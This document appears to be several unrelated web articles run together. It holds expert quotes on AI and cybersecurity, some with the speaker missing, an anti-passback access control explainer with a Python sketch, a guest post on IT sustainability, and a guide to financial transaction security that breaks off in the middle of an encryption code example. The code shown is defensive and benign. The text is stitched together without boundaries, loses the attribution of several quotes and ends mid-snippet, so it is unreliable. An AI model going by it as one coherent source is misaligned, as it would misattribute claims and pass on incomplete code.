AI's impact on cybersecurity has brought both advantages and challenges. On the positive side, AI has significantly enhanced threat detection capabilities by swiftly analyzing vast datasets and identifying anomalies, enabling quicker responses to potential breaches. Additionally, it has improved incident response by automating processes, reducing human error, and expediting breach containment and recovery. However, AI's adoption in cybersecurity has also introduced new challenges. Cybercriminals are now utilizing AI for more sophisticated attacks, automating the identification of vulnerabilities and crafting personalized phishing attempts. For Cybersecurity Awareness Month, we heard from experts across the industry on the impact of AI on cybersecurity, both pros and cons.

Joe Regensburger, Vice President of Research Engineering, Immuta

"AI and large language models (LLMs) have the potential to significantly impact data security initiatives. Already organizations are leveraging it to build advanced solutions for fraud detection, sentiment analysis, next-best-offer, predictive maintenance, and more. At the same time, although AI offers many benefits, 71% of IT leaders feel generative AI will also introduce new data security risks. To fully realize the benefits of AI, it's vital that organizations consider data security as a foundational component of any AI implementation. This means ensuring data is protected and in compliance with usage requirements. To do this, they need to consider four things: (1) "What" data gets used to train the AI model? (2) "How" does the AI model get trained? (3) "What" controls exist on deployed AI? and (4) "How" can we assess the accuracy of outputs? By prioritizing data security and access control, organizations can safely harness the power of AI and LLMs while safeguarding against potential risks and ensuring responsible usage."

David Divitt, Senior Director, Fraud Prevention & Experience, Veriff

"We've all been taught to be on our guard about "suspicious" characters as a means to avoid getting scammed. But what if the criminal behind the scam looks, and sounds, exactly like someone you trust? Deepfakes, or lifelike manipulations of an assumed likeness or voice, have exploded in accessibility and sophistication, with deepfakes-as-a-service now allowing even less-advanced fraud actors to near-flawlessly impersonate a target. This progression makes all kinds of fraud, from individual blackmail to defrauding entire corporations, significantly harder to detect and defend against. With the help of Generative Adversarial Networks (GANs), even a single image of an individual can be enough for fraudsters to produce a convincing deepfake of them. Certain forms of user authentication can be fooled by a competent deepfake fraudster, necessitating the use of specialized AI tools to identify the subtle but telltale signs of a manipulated image or voice. AI models can also be trained to identify patterns of fraud, enabling businesses to get ahead of an attack before it hits. AI is now at the forefront of fraud threats, and organizations that fail to use AI tech to defend themselves will likely find themselves the victim of it."

"There are a number of commonly used verification tools out there today, like multi-factor authentication (MFA) and knowledge-based authentication. However, these tools aren't secure enough on their own.
With the rise of new technologies like generative AI, cybercriminals can develop newer and more complex attacks that organizations need to be prepared for. Fraudsters can leverage ChatGPT, for instance, to create more convincing and targeted phishing scams to increase their credibility and impact, victimizing more users than before. This month's emphasis on cybersecurity reminds us that organizations must build a strong foundation starting with user verification and authentication to efficiently protect customer and organizational data from all forms of fraud. Strong passwords and MFA are always beneficial to have, but with the increasing sophistication of cyberattacks, organizations must implement biometric-backed identity verification methods. By cross-referencing the biometric features of an onboarded user with those of the cybercriminal attempting to breach the company, organizations can prevent attacks and ensure that the user accessing or using an account is authorized and not a fraudster, keeping vital data out of criminals' reach."

"This Cybersecurity Awareness Month is unlike previous years, due to the rise of generative AI within enterprises. Recent research found that 75% of security professionals witnessed an increase in attacks over the past 12 months, with 85% attributing this rise to bad actors using generative AI. The weaponization of AI is happening rapidly, with attackers using it to create new malware variants at an unprecedented pace. Current security mechanisms rooted in machine learning (ML) are ineffective against never-before-seen, unknown malware; they will break down in the face of AI-powered threats. The only way to protect yourself is with a more advanced form of AI. Specifically, Deep Learning. Any other ML-based, legacy security solution is too reactive and latent to adequately fight back. This is where EDR and NGAV fall short. What's missing is a layer of Deep Learning-powered data security, sitting in front of your existing security controls, to predict and prevent threats before they cause damage. This Cybersecurity Awareness Month, organizations should know that prevention against cyberattacks is possible, but it requires a change to the "assume breach" status quo, especially in this new era of AI."

"This Cybersecurity Awareness Month (CAM), a message to business leaders and technical folks alike: Software is immensely pervasive and foundational to innovation and market leadership. And if software starts with code, then secure or insecure code starts in development, which means organizations should be looking critically at how their code is developed. Only when code is clean (i.e. consistent, intentional, adaptable, responsible) can security, reliability, and maintainability of software be ensured. Yes, there has been increased attention to AppSec/software security and impressive developments in this arena. But still, these efforts are being done after the fact, i.e. after the code is produced. Failing to do this as part of the coding phase will not produce the radical change that our industry needs. Bad code is the biggest business liability that organizations face, whether they know it or not. And chances are they don't know it. Under their noses, technical debt is accumulating, leading to developers wasting time on remediation, paying some small interest for any change they make, and applications being largely insecure and unreliable, making them a liability to the business.
With AI-generated code increasing the volume and speed of output without an eye toward code quality, this problem will only worsen. The world needs Clean Code. During CAM, we urge organizations to take the time to understand and adopt a 'Clean as You Code' approach. This will not only stop the technical debt leak but also remediate existing debt whenever code is changed, drastically reducing cybersecurity risks - which is absolutely necessary for businesses to compete and win, especially in the age of AI."

David Menichello, Director, Security Product Management at Netrix

"Generative AI is creating an imbalance between offensive and defensive security teams. On the offensive side, generative AI is accelerating the development of exploits and payloads. On the defensive side, it is a useful tool for the blue teams protecting their networks and applications, helping them automate and bridge gaps across a population of IT assets that may be vulnerable and that do not sit under a single management program through which they can easily be patched, secured, or interrogated for susceptibility to attack. There will always be an imbalance, because the attack side can weaponize exploits more quickly than the defense side can assess, test, and patch."

"First and foremost, whether an employee has been at an organization for 20 days or 20 years, they should have a common understanding of how their company approaches cybersecurity, and be able to report common security threats. It's been refreshing to see security come to the forefront of conversation for most organizations. Twenty years ago, cybersecurity awareness was rarely even a training concern unless you were at a bank or regulated institution. Today, it is incredibly important that this heightened interest and attention to security best practices continues. With advancements in technology like AI, employees across industries will face threats they've never encountered before - and their foundational knowledge of cybersecurity will be vital. Employees today should be well-trained on security standards and feel comfortable communicating honestly with their security teams. Even more important, security leaders should ensure their organizations have anonymous channels for employees to report their concerns without fear of retaliation or consequence. By building education and awareness into the foundation of your organization's security framework, and empowering employees, the odds of a threat being realized decrease dramatically."
What is Anti Passback?

Anti passback (APB) is an access control security measure that prevents the 'passing back' of an access card: once a card has been used to enter, it cannot be used for a successive entry by another person. The measure prevents keycard misuse and unauthorized access. There are several variants of the APB measure, including soft, hard, area, and timed anti passback. Deciding which variant of anti passback access control is right for your business depends on your security requirements.

Types of Anti Passback

Hard anti passback: when the anti passback rule is violated, the cardholder is denied access.
Soft anti passback: a violation of the APB rules results in granted access, but administrators of the system receive an alert identifying the incident and the associated cardholder.
Area anti passback: until a card is used at an 'in' reader at the entrance to the building, the card will not work at any readers inside the building.
Timed anti passback: once a card has been used to enter an area, it cannot be used at the same reader again until a defined time period has passed, for example 15 minutes.

Having reviewed the types of anti passback available, let's look at how it works.

Anti passback works by recording who has entered and exited a specific area. This is achieved via access cards that have to be used in conjunction with a reader from the access control system. Every time a card is used to enter, it must be used to exit before it can be used to enter again. (A minimal code sketch of this in/out logic appears at the end of this article.) An easy way to picture this is through the following example: Person A works in a building and has a valid access card to gain entry. Person B wants to gain entry to the building, but has no valid credential to do so. Person A and Person B approach the entrance and Person A swipes their access card, which grants them entry to the building. Person A then passes their credential back to Person B, who swipes the same card on the same reader, but is denied entry due to the anti passback measures on the reader. An alert is sent to the administrator to notify them of the violation of the anti passback rule.

By swiping or tapping into an area, the user temporarily revokes their own access, preventing them from re-entering with their credential until they have exited the area by swiping or tapping the corresponding reader. Therefore, when they pass their credential back to an unauthorized person, the second use of the card to gain access is denied.

A popular application of APB is at parking gates. In these settings, a user swipes their card when entering and exiting the lot. The user can enter and exit as many times as they desire, as long as the sequence remains an 'in and out' pattern. However, if a user were to enter and then pass their card back to a colleague, friend, or neighbor, the pattern becomes 'in and in', which the anti passback measure rejects, denying the second request for entry. Until that card has been used to exit the lot, the system will not allow entry.

Example applications of anti-passback

Anti-passback is commonly used in parking facilities, but it has many other useful applications, such as office and employee entrances. Typical examples include:
- Protect patients, staff, and expensive equipment with anti-passback.
- Prevent multiple drivers from using the same access credential, keeping parking spaces available for authorized vehicles.
- Ensure only authorized cardholders can enter certain areas of the facility.
- Prevent customers from sharing credentials and skipping membership fees; integrate with turnstiles or gates to ensure capacity limits are adhered to and only paying users can access the facility.
- Parking lots and multi-storey car parks: ensure accurate parking space counting, preventing too many cars from entering the lot, and stop unauthorized vehicles from entering restricted parking areas.
- Ensure that only authorized guests can access your facility; access cards cannot be passed from paying guests to unauthorized persons at the perimeter barriers to gain entry free of charge.
- Prevent employees from sharing credentials to access the building, improve security and safety by ensuring that unauthorized persons cannot tailgate your employees into the building, and gain accurate information on employee attendance.
- Provide accurate occupant information in laboratories, preventing unwanted personnel from entering or removing laboratory equipment, and help stop potentially hazardous accidents from occurring.

Anti-Passback with Keri Systems

Keri Systems' Doors.NET software integrates customizable anti-passback security measures, ensuring that you can use the feature in the most effective way for your building or facility. Keri Systems offers all types of anti-passback measures and allows full flexibility when applying these rules. For example, certain cardholders can be exempt from anti-passback rules, whereas others can have hard or soft, timed or area APB rules depending on their role or access needs.
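To make the in/out logic described above concrete, here is a minimal, hypothetical sketch in Python of how an access controller might track anti-passback state. It is illustrative only and is not based on Keri Systems' Doors.NET software or any other product; the class name, mode names, and timeout value are assumptions chosen for the example.

```python
from datetime import datetime, timedelta

class AntiPassbackController:
    """Toy in/out state tracker illustrating hard, soft and timed anti passback."""

    def __init__(self, mode="hard", timeout=timedelta(minutes=15)):
        self.mode = mode          # "hard", "soft" or "timed" (assumed mode names)
        self.timeout = timeout    # re-entry delay, used only in timed mode
        self.inside = set()       # cards that have entered but not yet exited
        self.last_entry = {}      # card -> time of last granted entry

    def swipe_in(self, card, now=None):
        now = now or datetime.now()
        if self.mode == "timed":
            last = self.last_entry.get(card)
            violation = last is not None and now - last < self.timeout
        else:
            violation = card in self.inside   # an 'in' without a matching 'out'

        if violation:
            if self.mode in ("hard", "timed"):
                return "DENIED: anti-passback violation"
            # Soft mode: access is granted, but administrators are alerted.
            print(f"ALERT to administrator: APB violation by {card}")

        self.inside.add(card)
        self.last_entry[card] = now
        return "GRANTED"

    def swipe_out(self, card):
        self.inside.discard(card)  # clears the card for its next entry
        return "GRANTED"

# Person A enters, then passes the card back to Person B at the same reader.
apb = AntiPassbackController(mode="hard")
print(apb.swipe_in("card-001"))   # GRANTED
print(apb.swipe_in("card-001"))   # DENIED: anti-passback violation
print(apb.swipe_out("card-001"))  # GRANTED - the card may now enter again
```

A real controller would also handle area anti passback (separate in and out readers per zone) and persist this state in the access control database, but the core idea is the same in/out bookkeeping described above.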
This is a guest post by Han Chon, managing director for ASEAN at Nutanix

There has been much discussion around how technology can be used to accelerate sustainability efforts, from green IT to automated and digitised systems, and the integration of new data sets in emissions reduction. What is often overlooked, however, is the fact that many of these technologies, and the energy and infrastructure they require, can actually expand a company's carbon footprint rather than reduce it. This raises the question: is technology hindering the fight against climate change more than it is helping it?

Across the Asia-Pacific, there is a stronger impetus than ever for companies to 'go green' and embrace sustainability across their organisations. Many markets across the region now require publicly listed companies to disclose climate reporting, and there is increased investor scrutiny of companies' environmental, social and governance (ESG) commitments. However, the pitfall that many businesses have fallen into is hopping on the green bandwagon simply to tick a corporate social responsibility checkbox, without meaningfully engaging with how sustainability can be integrated into their organisation's operations, processes, and overall DNA.

The IT industry is no exception. Having waxed lyrical about the positive impact that technology can have in accelerating climate action and preventing the emission of more than one billion metric tons of carbon dioxide (CO2), technology companies have done little to address these challenges. The sector's notoriously resource-intensive nature, particularly where chip-making and datacentres are concerned, continues to be a cause for concern as well. The information and computing technology sector is currently expected to account for nearly 20% of global energy demand by 2030, up from 3% today.

The truth is that while our need to reduce emissions has never been greater, our need for energy has never been higher either. With the digital economy at an all-time boom, and every business now seeking to become a digital enterprise, there is simply no escaping our increasing need for more computing power. This demand is only expected to rise in the years ahead, hastened by rapid digitalisation and wider adoption of technologies like 5G, artificial intelligence, the internet of things, and blockchain.

So, if there is no wriggling out of technology's all-encompassing grasp, how can we find a more sustainable way around the issue? The way forward could be to adopt a more holistic approach that prioritises both technology and sustainability considerations, without compromising the business bottom line.

Most industry conversations thus far have focused, perhaps disproportionately so, on the exhaustive environmental impact of datacentres. But recent studies have indicated that newer datacentres, developed with sustainable technologies and fuelled by renewable energy sources, can reduce overall rates of energy consumption and emissions without sacrificing the need for increased computing capacity. These newer datacentres can deliver six times more computing output while consuming only a marginal 6% more energy. Major cloud computing players like Amazon Web Services (AWS) and Microsoft have already been fast adopters, while others like Google Cloud are launching solutions that provide businesses with data-driven insight into their carbon footprint, alongside recommendations and deployable tools to reduce their carbon emissions.
Leaving legacy behind

However, datacentres present just one part of the equation. As technologies evolve and more businesses pivot to hybrid and multicloud models to meet their increasing need for operational agility, many are grappling with the complexities and fallout of managing various cloud architectures across multiple platforms, which often comprise siloed, legacy components.

This is troubling for several reasons. Traditional IT infrastructure is composed of three primary layers (server, storage, and network), all of which are energy-intensive to operate and require a significant amount of hardware and cooling to maintain. The hefty environmental footprint that many legacy IT systems create has earned them the notorious label of 'gas guzzlers' in the industry, and it makes them increasingly costly and laborious to keep up as well. At the same time, these legacy systems often no longer serve the needs of companies as they look to scale their operational agility, reduce total cost of ownership, and increase returns on their technology investments.

Modern IT environments, such as those powered by hyperconverged infrastructure (HCI), collapse traditional three-tier setups into a single, consolidated layer within an organisation's technology stack. This simplifies and streamlines organisations' journeys to the cloud, and enables them to tap into public, private and hybrid cloud services more easily. At the same time, it significantly reduces the energy and hardware required to run traditional datacentres, directly lowering businesses' energy consumption, carbon emissions, and operating costs.

For instance, Indonesia's Bank BPD Bali successfully leveraged cloud to drive increased IT efficiency, which meant it could reduce its datacentre footprint by approximately 70%, reduce the utilities needed for power and cooling, and even gain operational cost savings of up to 80%. Similarly, Australian manufacturer Nature's Organics overhauled its energy-hungry and underpowered IT infrastructure to better manage resource and energy consumption and drive greater efficiencies across its eco-friendly manufacturing operations. In doing so, the company was able to reduce its IT-related energy consumption and environmental footprint by approximately 55%.

Technology and sustainability: working in tandem

While there is no denying that today's technologies demand greater computing power and energy than before, they could also be one of the greatest forces for good in the fight against climate change. In fact, cloud has already proven instrumental in enabling companies to track and reduce their carbon emissions and footprint, and to run their operations sustainably and efficiently, with a significant benefit to the business bottom line: a triple win in which neither the enterprise nor the environment is sacrificed.

So, is technology more a hindrance or a help to the climate movement? The evidence suggests the latter. But it all hinges on whether businesses continue to leverage IT innovatively, and responsibly. One thing is for sure: the world would be nowhere closer to meeting its sustainability targets if we did not harness the power of technology.
In today's world, where almost every transaction we make happens online, keeping our financial data secure has never been more important. Imagine paying for your morning coffee with a tap on your phone, transferring money to a friend with a quick swipe, or making a large business deal without ever stepping into a bank. These conveniences are fantastic, but they also open up new avenues for cybercriminals looking to exploit vulnerabilities. This case study dives deep into the essentials of financial transaction security. We'll walk through the various threats lurking in the digital shadows, the regulations in place to protect us, and the best practices that organizations need to adopt to stay safe.

A short overview of financial transactions

Financial transactions involve the transfer of money or assets between parties. These transactions form the backbone of the global economy, enabling commerce and trade across various sectors. Financial transactions can be broadly categorized into retail, corporate, and investment transactions.

Retail transactions are at the heart of everyday consumer activities. They encompass a wide range of purchases and payments made by individuals for goods and services. Key examples include:
- Credit/debit card payments: one of the most common methods, where consumers use their credit or debit cards to make purchases in physical stores or online. The convenience and widespread acceptance of these cards make them a staple in retail transactions.
- Mobile payments: with the rise of smartphones, mobile payment solutions like Apple Pay, Google Wallet, and Samsung Pay have become increasingly popular. These methods allow consumers to make payments quickly and securely using their mobile devices, often with just a tap or a scan.
- Online banking: most people these days manage their finances and make transactions through online banking platforms. These platforms offer services like bill payments, fund transfers, and account management, providing a seamless and accessible way to handle personal finances from anywhere with an internet connection.

Corporate transactions are essential for the smooth operation of businesses. They involve larger sums of money and often require more complex security measures to ensure their integrity. Examples of corporate transactions include:
- B2B payments: business-to-business payments are transactions between companies. They can include payments for goods and services, contractor payments, and other business-related expenses. They usually involve large sums and require secure, efficient payment processing systems.
- Wire transfers: used for transferring funds electronically between banks, wire transfers are a staple for corporate transactions. They are particularly useful for high-value transfers, both domestic and international. Ensuring the security of these transfers is crucial to prevent fraud and unauthorized access.
- Payroll disbursements: companies need to pay their employees regularly, and payroll disbursements are the transactions that handle these payments. They can be executed through direct deposits into employee bank accounts or through payroll cards. Ensuring the accuracy and security of payroll transactions is vital for maintaining employee trust and satisfaction.

The third type, investment transactions, involves the buying and selling of financial assets. These transactions are crucial for individual investors and institutions looking to grow their wealth.
Examples include:
- Stock trades: buying and selling shares of companies on stock exchanges. Investors and traders participate in stock markets to gain returns on their investments. The security of trading platforms and the protection of investor data are critical to prevent market manipulation and fraud.
- Bond purchases: investing in bonds issued by governments or corporations. Bonds are considered safer investments than stocks, but they still require secure platforms to manage the transactions and protect investor interests.
- Cryptocurrency exchanges: the rise of digital currencies like Bitcoin, Ethereum, and others has introduced a new dimension to investment transactions. Cryptocurrency exchanges facilitate the buying, selling, and trading of these digital assets. Given the decentralized and often unregulated nature of cryptocurrencies, ensuring the security of exchanges is paramount to protect investors from hacking and fraud.

Each of these transaction types has its own set of security challenges and requirements. Understanding these nuances is essential for developing robust security measures that protect all parties involved in financial transactions.

Digital transformation and its impact on financial institutions

The digital transformation has revolutionized the financial sector, shifting from traditional banking and cash transactions to digital platforms. This evolution has brought unprecedented convenience and accessibility to financial services, but it has also introduced new security challenges. As more people and businesses embrace digital financial tools, the need for strong and reliable security measures becomes ever more critical.

Mobile banking apps

Mobile banking apps have transformed the way people manage their finances. These apps allow users to perform a wide range of banking operations from the convenience of their smartphones. Key features include:
- Account management: users can check their account balances, review transaction histories, and manage multiple accounts with just a few taps on their mobile devices. This real-time access to financial information improves user control over personal finances.
- Fund transfers: mobile banking apps enable quick and easy transfers between accounts, whether within the same bank or to external accounts. Features like Zelle or other peer-to-peer payment systems integrated within banking apps make sending money to friends, family, or businesses instantaneous.
- Bill payments: users can schedule and pay bills directly through their mobile banking apps, eliminating the need for paper checks or manual payments. Automatic payment setups ensure that bills are paid on time, helping to avoid late fees and maintain good credit standing.
- Mobile deposits: many banking apps offer mobile check deposits, where users can simply take a photo of a check with their phone's camera to deposit it into their account. This feature saves time and provides flexibility for users who may not have easy access to a bank branch.

Mobile banking apps revolutionize financial management by providing real-time access to accounts, quick fund transfers, seamless bill payments, and convenient mobile check deposits. Although enhanced security measures protect users, it is essential to remain vigilant and practice safe usage to fully benefit from these advancements.

E-commerce platforms have revolutionized retail, allowing consumers to shop for products and services from the comfort of their homes.
These platforms facilitate online shopping and digital payments, driving the growth of the digital economy. Let's check their key aspects:
- Online marketplaces: platforms like Amazon, eBay, and Alibaba connect buyers and sellers from around the world. These marketplaces offer a wide range of products, competitive pricing, and user reviews, making online shopping an attractive option for consumers.
- Payment gateways: secure payment gateways are essential for processing online transactions. Companies like PayPal, Stripe, and Square provide payment processing services that encrypt sensitive information, reducing the risk of data breaches and fraud.
- Digital carts and checkout processes: e-commerce platforms streamline the shopping experience with digital carts and seamless checkout processes. Features like saved payment information, one-click purchases, and guest checkouts enhance user convenience and encourage repeat business.
- Security measures: to ensure the security of online transactions, e-commerce platforms implement various security measures such as SSL/TLS encryption, two-factor authentication, and fraud detection systems. These measures help protect consumer data and build trust in online shopping.

The rise of e-commerce has expanded the digital economy, creating new opportunities for businesses and consumers alike. However, it also necessitates stringent security protocols to protect against cyber threats such as phishing, identity theft, and payment fraud.

Digital wallets, also known as e-wallets, have become a popular method for storing payment information securely and making quick transactions. These wallets offer several advantages, including:
- Convenience: digital wallets like Apple Pay, Google Wallet, and Samsung Pay allow people to store their credit and debit card information securely on their mobile devices. This eliminates the need to carry physical cards and makes transactions faster and more convenient.
- Contactless payments: digital wallets enable contactless payments, where users can simply tap their phone or smartwatch on a payment terminal to complete a transaction. This feature has gained popularity, especially in the wake of the COVID-19 pandemic, as it reduces physical contact and enhances hygiene.
- Integration with other services: digital wallets often integrate with other financial services, such as loyalty programs, gift cards, and transit passes. This integration provides a seamless user experience and adds value to the digital wallet ecosystem.
- Enhanced security: these wallets also employ various security measures to protect user information. These include tokenization, where actual card numbers are replaced with unique tokens during transactions, and biometric authentication, such as fingerprint or facial recognition, to authorize payments.

The adoption of digital wallets is on the rise, driven by their convenience and enhanced security features. However, as with any digital technology, there are security risks to consider. Ensuring the security of digital wallets involves implementing multi-layer encryption, regular software updates, and educating users about potential threats.

What else has happened with this shift?

Moving to digital platforms has fundamentally changed the landscape of financial transactions. While digital transformation brings many convenient benefits, it also introduces new security challenges. Organizations must stay vigilant and adopt comprehensive security measures to protect against evolving threats.
Key considerations include:
- Educating consumers and employees about cybersecurity practices, which is essential for preventing security breaches. This includes recognizing phishing attempts, using strong passwords, and regularly updating software.
- Adhering to regulations such as PCI DSS, GDPR, and other industry standards, which is critical for maintaining the security and integrity of financial transactions. Compliance helps protect sensitive information and avoid legal and financial penalties.
- Continuous monitoring and improvement: implementing continuous monitoring systems to detect and respond to security threats in real time is essential, and organizations should regularly review and update their security policies and procedures to stay ahead of emerging threats.

As more transactions occur online, the potential attack surface for cybercriminals expands significantly, and cybercriminals are constantly evolving their tactics to exploit vulnerabilities in digital financial systems.

Increased attack vectors

The shift to digital platforms opens numerous attack vectors. Cybercriminals can target mobile banking apps, e-commerce sites, digital wallets, and online banking platforms through various methods such as malware, phishing, and man-in-the-middle attacks. Each of these entry points requires stringent security protocols to safeguard against breaches.

The sophistication of cyber attacks

Cyber attacks are becoming more sophisticated, with attackers using advanced techniques like AI-driven malware, ransomware, and social engineering. These attacks can bypass traditional security measures, making it imperative for financial institutions to adopt proven security solutions, such as machine learning-based threat detection and behavior analytics.

Volume of transactions

The sheer volume of digital transactions increases the likelihood of potential security breaches. Financial institutions must ensure that their systems can handle high transaction volumes without compromising security. This involves implementing scalable security solutions that can protect against both common and sophisticated threats.

Regulatory bodies are continually updating compliance requirements to address emerging security challenges. Financial institutions must stay abreast of these changes and ensure compliance with standards such as PCI DSS, GDPR, and other regional regulations. Non-compliance can result in severe penalties and damage to an institution's reputation.

Trust is a cornerstone of the financial industry. Any breach or compromise of financial transactions can erode consumer trust, leading to a loss of customers and potential financial repercussions. Institutions must prioritize transparency and communication with consumers, ensuring that their financial data is secure.

Ensuring the resilience of financial operations in the face of cyber threats is critical. Financial institutions must develop and implement comprehensive incident response plans to quickly identify, contain, and remediate security breaches. Regular testing and updating of these plans are essential to adapt to the evolving threat landscape.

Importance of securing financial transactions: protecting consumer data

Consumer data protection is critical for maintaining trust and compliance with regulatory requirements. Financial institutions must adopt a holistic approach to data protection that encompasses several key aspects.

Confidentiality: ensuring personal information remains confidential is paramount.
Financial institutions must implement encryption protocols to protect data both in transit and at rest. Encryption ensures that even if data is intercepted, it cannot be read by unauthorized parties. Additionally, access controls and authentication mechanisms must be in place to restrict access to sensitive data.

Integrity: protecting data from unauthorized alterations is essential for maintaining the accuracy and reliability of financial information. This involves implementing checks and balances to detect and prevent any unauthorized changes to data. Financial institutions should use cryptographic hashing to verify the integrity of data and employ audit trails to track and monitor any changes.

Availability: guaranteeing that financial services are accessible when needed is crucial for operational efficiency and customer satisfaction. Financial institutions must ensure their systems are robust and resilient enough to withstand cyber attacks and other disruptions. This includes implementing redundancy measures, regular backups, and disaster recovery plans to minimize downtime and ensure continuous availability of services.

Preventing financial fraud

Fraud prevention is a crucial aspect of financial transaction security. Financial fraud can take many forms, and preventing it requires a multi-faceted approach:
- Identity theft: using someone else's personal information for fraudulent activities can have devastating consequences for victims. Financial institutions must implement strong identity verification processes to prevent identity theft. This includes using multi-factor authentication (MFA), biometric verification, and secure onboarding processes to verify the identities of new customers.
- Phishing: deceptive emails or messages aimed at stealing sensitive information are a common tactic used by cybercriminals. Financial institutions must educate their customers about the dangers of phishing and how to recognize suspicious communications. Implementing email security controls such as SPF, DKIM, and DMARC can help protect against phishing attacks by verifying the authenticity of emails.
- Card skimming: illegally capturing card information during transactions can lead to significant financial losses for both consumers and businesses. Financial institutions must ensure that point-of-sale (POS) systems and ATMs are secure and regularly inspected for skimming devices. Using chip-enabled (EMV) cards and contactless payment methods can also help reduce the risk of card skimming.
- Transaction monitoring: implementing real-time transaction monitoring systems is vital for detecting and preventing fraudulent activities. Financial institutions should use machine learning algorithms and behavior analytics to identify unusual patterns and flag potentially fraudulent transactions. Promptly investigating and responding to these alerts can prevent fraud and minimize losses. (A simple rule-based sketch of this kind of flagging appears at the end of this section.)
- User education and awareness: educating users about common fraud tactics and best practices for protecting their financial information is the first line of defense. Financial institutions should conduct regular awareness campaigns, provide resources on identifying and avoiding fraud, and encourage users to report any suspicious activities immediately.

By addressing these aspects, financial institutions can create a solid security framework that protects consumer data and prevents financial fraud.
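As a rough illustration of the transaction-monitoring idea above, the sketch below flags transactions whose amount is far outside a customer's history or that originate from a country the customer has never transacted in. This is a hypothetical, rule-based toy rather than a production fraud model; real systems rely on trained machine learning models and far richer features, and the function names and thresholds here are assumptions.

```python
from statistics import mean, stdev

def flag_transaction(history, amount, country, z_threshold=3.0):
    """Return a list of reasons a transaction looks suspicious (empty = none)."""
    amounts = [t["amount"] for t in history]
    known_countries = {t["country"] for t in history}

    reasons = []
    # Amount far outside the customer's usual spending pattern.
    if len(amounts) >= 2 and stdev(amounts) > 0:
        z = (amount - mean(amounts)) / stdev(amounts)
        if abs(z) >= z_threshold:
            reasons.append(f"amount z-score {z:.1f} exceeds threshold {z_threshold}")
    # Transaction from a location the customer has never used before.
    if country not in known_countries:
        reasons.append(f"first transaction seen from {country}")
    return reasons

# A customer who normally spends ~$45 in the US suddenly spends $2,500 abroad.
history = [{"amount": a, "country": "US"} for a in (42.0, 37.5, 55.0, 48.2, 40.0)]
print(flag_transaction(history, amount=2500.0, country="RO"))
```

In practice such rules would feed alerts into a case-management queue for analysts, alongside model-based risk scores, rather than blocking transactions outright.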
Regulatory and compliance requirements you should know about

The security of financial transactions is governed by several stringent regulations designed to protect consumer data and ensure the integrity of financial systems. Compliance with these regulations is essential for financial institutions and businesses that handle sensitive financial information. Here are some of the key regulations.

PCI DSS (Payment Card Industry Data Security Standard)

PCI DSS is a set of security standards designed to ensure that all companies that accept, process, store, or transmit credit card information maintain a secure environment. Key requirements include:
- Building and maintaining a secure network: installing and maintaining a firewall configuration to protect cardholder data, and using strong access control measures to restrict access to data on a need-to-know basis.
- Protecting cardholder data: encrypting the transmission of cardholder data across open, public networks and ensuring that stored cardholder data is protected using strong encryption methods (a minimal field-level encryption sketch appears after this compliance section).
- Maintaining a vulnerability management program: using and regularly updating anti-virus software, and developing and maintaining secure systems and applications.
- Implementing strong access control measures: assigning a unique ID to each person with computer access to ensure accountability, and restricting physical access to cardholder data.
- Regularly monitoring and testing networks: tracking and monitoring all access to network resources and cardholder data, and regularly testing security systems and processes.
- Maintaining an information security policy: maintaining a policy that addresses information security for all personnel.

GDPR (General Data Protection Regulation)

GDPR is a comprehensive data protection law in the European Union that mandates strict data protection and privacy measures for organizations handling the personal data of EU residents. Key aspects include:
- Data protection principles: organizations must process personal data lawfully, fairly, and transparently. Data must be collected for specified, explicit, and legitimate purposes and should be limited to what is necessary for those purposes.
- Rights of data subjects: GDPR grants individuals various rights, including the right to access their data, the right to rectification, the right to erasure (right to be forgotten), and the right to data portability.
- Data security: organizations must implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk, including encryption and pseudonymization of personal data.
- Data breach notification: organizations must report data breaches to the relevant supervisory authority within 72 hours of becoming aware of the breach, and inform affected individuals without undue delay if the breach is likely to result in a high risk to their rights and freedoms.
- Data protection impact assessments (DPIAs): organizations must conduct DPIAs for processing activities that are likely to result in high risk to the rights and freedoms of individuals, to identify and mitigate potential risks.

SOX (Sarbanes-Oxley Act)

SOX is a U.S. federal law that sets requirements for financial reporting and internal controls to protect investors from fraudulent financial reporting by corporations.
Key requirements include:
- Internal controls: organizations must establish and maintain an adequate internal control structure and procedures for financial reporting. This involves regular evaluation and documentation of internal controls to ensure the accuracy and reliability of financial statements.
- Financial disclosures: senior executives must certify the accuracy and completeness of financial reports, and any material changes to financial conditions or operations must be disclosed in a timely manner.
- Audit requirements: organizations must engage independent external auditors to review and attest to the effectiveness of internal controls over financial reporting. Audit committees must be independent and oversee the audit process.
- Record retention: organizations must retain records and documents that are relevant to financial reporting and audits for a specified period. Destruction or alteration of documents to impede investigations or audits is prohibited.

Compliance with these regulations is not just a legal obligation but also a critical component of a robust security strategy. Here's how these regulations impact security strategies:
- Risk mitigation: adhering to regulatory requirements helps organizations identify and mitigate risks associated with financial transactions. By implementing prescribed security controls, organizations can reduce the likelihood of data breaches and fraud, thereby protecting sensitive financial information.
- Enhanced security posture: compliance with regulations like PCI DSS, GDPR, and SOX requires organizations to adopt best practices in data protection and security. This leads to a strong security posture, with comprehensive policies, procedures, and technical controls in place to safeguard financial data.
- Consumer trust and confidence: regulatory compliance demonstrates an organization's commitment to protecting customer data and maintaining the integrity of financial transactions. This fosters trust and confidence among consumers, who are more likely to engage with businesses that prioritize data security.
- Legal and financial consequences: non-compliance with regulations can result in severe penalties, including hefty fines, legal actions, and reputational damage. For example, GDPR violations can lead to fines of up to 4% of annual global turnover or €20 million, whichever is higher. Similarly, non-compliance with PCI DSS can result in fines, increased transaction fees, and loss of the ability to process credit card payments. Ensuring compliance helps organizations avoid these consequences.
- Continuous improvement: regulatory requirements often mandate regular reviews, audits, and updates to security practices. This drives organizations to continuously assess and improve their security measures, keeping them up to date with evolving threats and technologies. Regular compliance audits also provide valuable insights into potential security gaps and areas for enhancement.
- Cross-border considerations: for organizations operating internationally, compliance with regulations like GDPR is essential for conducting business in different regions. Ensuring compliance with various regional regulations helps organizations expand their global reach while maintaining consistent security standards across jurisdictions.
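To make the PCI DSS requirement to protect stored cardholder data a little more concrete, here is a minimal sketch of field-level encryption at rest using the open-source Python cryptography library (Fernet, an AES-based authenticated encryption recipe). It is illustrative only: PCI DSS compliance involves far more than encrypting one field, and in practice the key would come from an HSM or managed key vault with rotation and strict access controls, never be generated inline as it is here.

```python
# pip install cryptography
from cryptography.fernet import Fernet

# Illustration only: in production the key lives in an HSM or key vault.
key = Fernet.generate_key()
cipher = Fernet(key)

# Encrypt a cardholder data field before writing it to storage.
pan = "4111111111111111"  # a standard test card number, not real cardholder data
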